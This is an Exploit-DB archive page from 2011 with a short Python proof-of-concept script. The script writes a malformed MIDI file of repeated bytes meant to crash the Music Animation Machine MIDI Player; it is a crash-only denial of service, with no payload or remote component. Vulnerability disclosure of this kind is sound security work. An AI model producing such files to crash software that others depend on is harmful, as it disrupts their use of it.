Lucene search

K
exploitdbC0d3R'ZEDB-ID:15897
HistoryJan 03, 2011 - 12:00 a.m.

Music Animation Machine MIDI Player - Local Crash (PoC)

2011-01-0300:00:00
c0d3R'Z
www.exploit-db.com
15

AI Score

7.4

Confidence

Low

EPSS

0.011

Percentile

84.6%

# Exploit Title: Music Animation Machine MIDI Player Local Crash PoC
# Date: 1/3/2011
# Author: c0d3R'Z
# Software Link: http://www.musanim.com/player/MAMPlayer2006aug19_035.zip
# Version: Release 035
# Tested on: Windows XP SP2 EN (VirtualBox)

 
# The application crashes when trys to convert a malformed midi file
 
#!/usr/bin/python
 
buffer     = "\x31\x33\x33\x37" * 1337
 
try:
    f = open("test.mid",'w')
    f.write(buffer)
    f.close()
 
    print " Vulnerable file created!..."
    print " Open the mid file with the application and Voila!! , it crashes!!\n"
except:
    print "[-] Error occured!"

AI Score

7.4

Confidence

Low

EPSS

0.011

Percentile

84.6%

Related for EDB-ID:15897